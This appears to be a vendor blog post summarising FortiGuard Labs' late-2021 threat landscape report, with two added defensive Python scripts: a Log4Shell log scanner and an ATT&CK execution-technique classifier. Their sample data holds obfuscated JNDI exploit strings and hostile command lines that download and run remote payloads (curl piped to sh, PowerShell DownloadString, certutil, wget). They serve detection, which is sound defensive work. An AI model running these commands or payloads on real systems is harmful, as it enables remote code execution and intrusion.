Latest Threat Landscape Report Has Actionable Take-Aways

Every six months, FortiGuard Labs publishes an updated Global Threat Landscape Report. Each edition contains a great deal of new intelligence that organizations and IT security teams can use to better defend themselves against cyberthreats. The report is built from data compiled by Fortinet sensors worldwide, which document billions of threat events.

The February 2022 edition, which covers the second half of 2021, uses the MITRE ATT&CK framework as a guide to classify attacker tactics, techniques, and procedures (TTPs). Sorting attacks by TTP gives defenders a better idea of what to expect from attackers and lets them be proactive instead of only reactive.

Another goal of the report is to provide security professionals with global and regional perspectives. We believe the broad and specific insights into the global threat landscape will empower defenders to make good decisions that reduce risks and better protect and preserve their digital resources.

In keeping with its tradition of providing useful and actionable take-aways, the report states that two major trends emerged over the second half of 2021:

1) Cyberattacks are getting more sophisticated.

2) Cybercriminals are developing attacks faster than ever.

Sophisticated Attack Methods
In the past, it was uncommon for cybercriminals to use sophisticated attack methods; typically they reused code that was already available online, modifying it as needed. Recently, however, FortiGuard Labs has been seeing attacks that are more sophisticated and are designed and built for specific targets.

A great benefit of the Threat Landscape Report is that it offers security professionals a view of “the forest fire” that may have eluded them while they were focused on keeping their own one or two “trees” from burning. It is vitally important to step back and see what is occurring at the macro level, and especially to know what the latest threats are.

Another key take-away regarding the increased sophistication of malware and other attacks is that cybercriminals are now taking advantage of more advanced development. It is no longer only Python: threat actors are writing malware in C++ for Linux targets, in Java, and in Go, and are building attacks aimed at IoT devices.

More Aggressive

Cybercriminals are employing reconnaissance to uncover vulnerabilities, working out how to exploit them, and staying under the radar by using techniques that were not thought of before or were not commonly used. We are also seeing a strong commitment to evading security controls.

In addition to greater sophistication, cybercriminals are becoming more aggressive, especially in their use of ransomware. During the pandemic there has been a relentless uptick of ransomware attacks to unprecedented levels. This is very concerning, because when more attacks are combined with more sophistication, threat levels, attack successes, and ransom payments all soar. Not only is the risk rising, but the actual destructiveness of attacks is exploding as well. One example is wiper malware posing as ransomware (so-called pseudo-ransomware), which destroys the target’s systems whether or not a ransom is paid.

Quicker Attack Execution

After analyzing the data for the second half of 2021, FortiGuard Labs found that attacks are being executed faster, especially compared with earlier targeted attacks. A decade ago, when security professionals had to deal with Stuxnet and other long-running threats, an attack might have taken as long as two years to develop. By contrast, the Log4j vulnerability (Log4Shell, CVE-2021-44228) disclosed in December 2021 accounted for the largest detection volume of the entire reporting period within just a 10-day window.

Another example of the increase in speed: compared with the ProxyLogon set of vulnerabilities in Microsoft Exchange from early 2021, Log4j activity ramped up 50 times faster, which is disconcerting. Because of the nature of the Log4j flaw, a spike in traffic followed the public announcement almost immediately as individuals began scanning the entire internet for vulnerable systems. Cybersecurity professionals must now react to most threats within a 48-hour window.
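As an added illustration of the kind of check a defender needs inside that 48-hour window (this is example code written for this page, not code from FortiGuard Labs or the report): Log4Shell fires when Log4j 2 logs a string containing a "${jndi:...}" lookup, so the scanning wave that followed disclosure placed that string in request paths and User-Agent headers, frequently URL-encoded or wrapped in nested lookups such as "${lower:j}" or "${::-j}" that Log4j resolves before performing the JNDI lookup. The script below normalizes web-server log lines the same way and flags the probes. The log lines, source addresses and callback hosts are constructed for the example.

```python
"""Flag Log4Shell-style JNDI lookup probes in web server access logs.

Added example for this article; not code from FortiGuard Labs or the report.
Log4Shell (CVE-2021-44228) triggers when Log4j 2 logs a string containing a
"${jndi:...}" lookup, so scanners stuffed that string into request paths and
User-Agent headers, frequently URL-encoded or wrapped in nested lookups such
as "${lower:j}" or "${::-j}" that Log4j resolves before the JNDI lookup.
The sample log lines and addresses below are constructed for the example.
"""
import re
import urllib.parse
from typing import Dict, List, Optional

# Constructed access-log sample (combined log format; payload in path or UA).
SAMPLE_LOG = r"""
203.0.113.10 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
203.0.113.11 - - [10/Dec/2021:14:02:12 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.12 - - [10/Dec/2021:14:03:40 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"
203.0.113.13 - - [10/Dec/2021:14:05:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}di:${lower:l}dap://198.51.100.7/a}"
203.0.113.14 - - [10/Dec/2021:14:05:30 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7/x}"
203.0.113.15 - - [10/Dec/2021:14:06:00 +0000] "GET /search?q=jndi HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# An innermost lookup: a ${...} whose body contains no further ${ or }.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we actually hunt for, once the line has been normalized.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:[^}]*\}?", re.IGNORECASE)
SOURCE_IP = re.compile(r"^(\S+)")


def _resolve(body: str) -> Optional[str]:
    """Evaluate one wrapper lookup body; None if it is not a known wrapper."""
    low = body.lower()
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:  # ${name:-default}: an undefined name yields the default
        return body.split(":-", 1)[1]
    return None


def deobfuscate(text: str) -> str:
    """Collapse nested lookups from the inside out until nothing changes."""
    def repl(m: "re.Match[str]") -> str:
        resolved = _resolve(m.group(1))
        return m.group(0) if resolved is None else resolved

    prev = None
    while prev != text:
        prev = text
        text = INNER_LOOKUP.sub(repl, text)
    return text


def normalize(line: str) -> str:
    """URL-decode twice (double encoding is common), then resolve lookups."""
    return deobfuscate(urllib.parse.unquote(urllib.parse.unquote(line)))


def scan_log(text: str) -> List[Dict[str, str]]:
    """One hit per log line that carries a JNDI lookup, with the normalized payload."""
    hits: List[Dict[str, str]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = JNDI_LOOKUP.search(normalize(line))
        if m:
            hits.append({"ip": SOURCE_IP.match(line).group(1), "payload": m.group(0)})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']:<16} {hit['payload']}")
```

The plain "q=jndi" query on the last sample line is deliberately left unflagged: the detection keys on the lookup syntax, not the word. In a real deployment the normalized payload's callback host is what you pivot on next, since the same scanner infrastructure tends to show up across many targets.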

Advantages and Disadvantages of Automation

Security operation centers (SOCs) have been taking advantage of API-driven automation for some time. Now cybercriminals are realizing they can use the same technology for their own purposes. Rather than crafting an attack for one specific target, they run mass scans and go after every organization found to have the weakness. This is a level of sophistication we had not seen before.

What this new level of sophistication and speed also reveals is how profitable cybercrime can be. A “reverse-engineering” thought exercise leads to the conclusion that if threat actors are putting so much effort into designing their malware, they must be realizing a substantial return on their investment of time and energy. Remember, cybercriminals are running a business operation too, even if it is illegal. The more they can automate to reduce their costs, the more profitable they will be.

More Threat Report Take-Aways

The Threat Landscape Report also highlights what the data shows when classified using MITRE ATT&CK tactics, techniques, and procedures. Look at the left side of the code execution chart below (Figure 11 from the report). API- and scripting-based techniques accounted for most of what cybercriminals used, over sixty percent of all code execution techniques. User execution, which requires someone to interact by clicking a dialog or a malicious link, accounts for only about twenty percent.

Previously, user interaction was the main feasible avenue for breaching a system, or for taking over a user’s account and then operating inside the network as an insider. Now, with APIs, threat actors can automate their attacks and go after high-value accounts without waiting for a click.
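As an added example of the classification the report describes (example code written for this page, not code or data from FortiGuard Labs): the script below maps process-creation events onto MITRE ATT&CK Execution techniques and tallies the share each technique family holds, so a defender can produce the same kind of breakdown as Figure 11 from their own telemetry. The technique IDs are real ATT&CK identifiers; the events are constructed and the mapping rules are a deliberately simple assumption of this example, not a classifier supplied by ATT&CK.

```python
"""Map process-creation telemetry onto MITRE ATT&CK Execution techniques and
tally the share each technique family holds.

Added example for this article; not code or data from FortiGuard Labs or the
report.  The technique IDs are real ATT&CK identifiers; the events below are
constructed, and the mapping rules are a deliberately simple assumption of this
example rather than an ATT&CK-supplied classifier.
"""
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Sequence


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # image path of the parent process
    image: str    # image path of the created process
    cmdline: str  # full command line of the created process


# Real ATT&CK Execution-tactic technique IDs used by this example.
TECHNIQUES = {
    "T1059.001": "Command and Scripting Interpreter: PowerShell",
    "T1059.003": "Command and Scripting Interpreter: Windows Command Shell",
    "T1059.004": "Command and Scripting Interpreter: Unix Shell",
    "T1059.005": "Command and Scripting Interpreter: Visual Basic",
    "T1059.006": "Command and Scripting Interpreter: Python",
    "T1059.007": "Command and Scripting Interpreter: JavaScript",
    "T1047":     "Windows Management Instrumentation",
    "T1053.005": "Scheduled Task/Job: Scheduled Task",
    "T1204.002": "User Execution: Malicious File",
}

# Heuristic tables (assumptions of this example).
DOCUMENT_READERS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
INTERPRETERS = {
    "powershell.exe": "T1059.001", "pwsh.exe": "T1059.001",
    "cmd.exe": "T1059.003",
    "sh": "T1059.004", "bash": "T1059.004", "dash": "T1059.004", "zsh": "T1059.004",
    "python": "T1059.006", "python3": "T1059.006", "python.exe": "T1059.006",
}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    """Lower-cased file name, tolerant of both Windows and POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent) -> List[str]:
    """Techniques an event evidences.  One event can map to several (e.g. a
    malicious document spawning cmd.exe is both T1204.002 and T1059.003)."""
    techniques: List[str] = []
    parent, image, cmd = basename(ev.parent), basename(ev.image), ev.cmdline.lower()
    if parent in DOCUMENT_READERS:              # a document reader spawned a child
        techniques.append("T1204.002")
    if parent == "wmiprvse.exe" or image == "wmic.exe":  # WMI-launched or wmic-launching
        techniques.append("T1047")
    if image == "schtasks.exe" and "/create" in cmd:
        techniques.append("T1053.005")
    if image in SCRIPT_HOSTS:                   # wscript/cscript run VBS or JS
        is_js = any(tok.endswith((".js", ".jse")) for tok in cmd.split())
        techniques.append("T1059.007" if is_js else "T1059.005")
    elif image in INTERPRETERS:
        techniques.append(INTERPRETERS[image])
    return techniques


def tally(events: Sequence[ProcEvent]) -> Counter:
    """Count technique observations across all events."""
    counts: Counter = Counter()
    for ev in events:
        counts.update(classify(ev))
    return counts


def share_by_family(counts: Counter) -> Dict[str, float]:
    """Share of all observations per top-level technique (T1059.* -> T1059)."""
    total = sum(counts.values())
    families: Counter = Counter()
    for tid, n in counts.items():
        families[tid.split(".")[0]] += n
    return {fam: round(n / total, 3) for fam, n in families.items()} if total else {}


# Constructed process-creation events (addresses are documentation ranges).
EVENTS = [
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc SQBFAFgA"),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c certutil -urlcache -split -f http://203.0.113.5/a.exe a.exe"),
    ProcEvent(r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://203.0.113.5/p')"),
    ProcEvent("/usr/sbin/sshd", "/bin/bash", "bash -c 'curl -s http://203.0.113.5/x.sh | sh'"),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", r"C:\Windows\System32\wscript.exe",
              "wscript.exe C:\\Users\\a\\AppData\\Local\\Temp\\invoice.vbs"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",
              "schtasks /create /sc minute /mo 5 /tn Updater /tr C:\\Users\\Public\\u.exe"),
    ProcEvent("/usr/bin/java", "/bin/sh", "sh -c 'wget -q http://203.0.113.5/k -O /tmp/k && chmod +x /tmp/k'"),
    ProcEvent("/usr/sbin/cron", "/usr/bin/python3", "python3 /tmp/.x.py"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wbem\wmic.exe",
              "wmic /node:fileserver process call create C:\\Users\\Public\\u.exe"),
]


if __name__ == "__main__":
    counts = tally(EVENTS)
    for tid, n in counts.most_common():
        print(f"{tid:<10} {n:>3}  {TECHNIQUES[tid]}")
    print(share_by_family(counts))
```

Feeding the constructed events through gives a scripting-interpreter (T1059) share of roughly 58 percent and a user-execution (T1204) share of roughly 17 percent; on real telemetry the numbers will differ, and the point is the pipeline, not the figures. Two design choices matter in practice: an event may carry several techniques (a document spawning cmd.exe is both user execution and a scripting interpreter), and parent-process context is what distinguishes a user click from an automated, API-driven launch.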

Another benefit of APIs for threat actors is that they do not have to “knock on the door” by hand to unearth vulnerabilities they can exploit. With APIs, that entire discovery step can be automated: the cybercriminals run a script and determine whether an exploit is worth their effort. This approach greatly reduces the criminal enterprise’s costs.

The same methods, however, can be used by IT security teams in many different ways, from SOCs to cloud deployments and beyond. From an organization’s point of view, it is critically important to have security automation that reacts quickly.

Learn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard Security Subscriptions and Services portfolio.

Learn more about Fortinet’s free cybersecurity training, an initiative of Fortinet’s Training Advancement Agenda (TAA), or about the Fortinet Network Security Expert program, Security Academy program, and Veterans program.

Copyright © 2022 IDG Communications, Inc.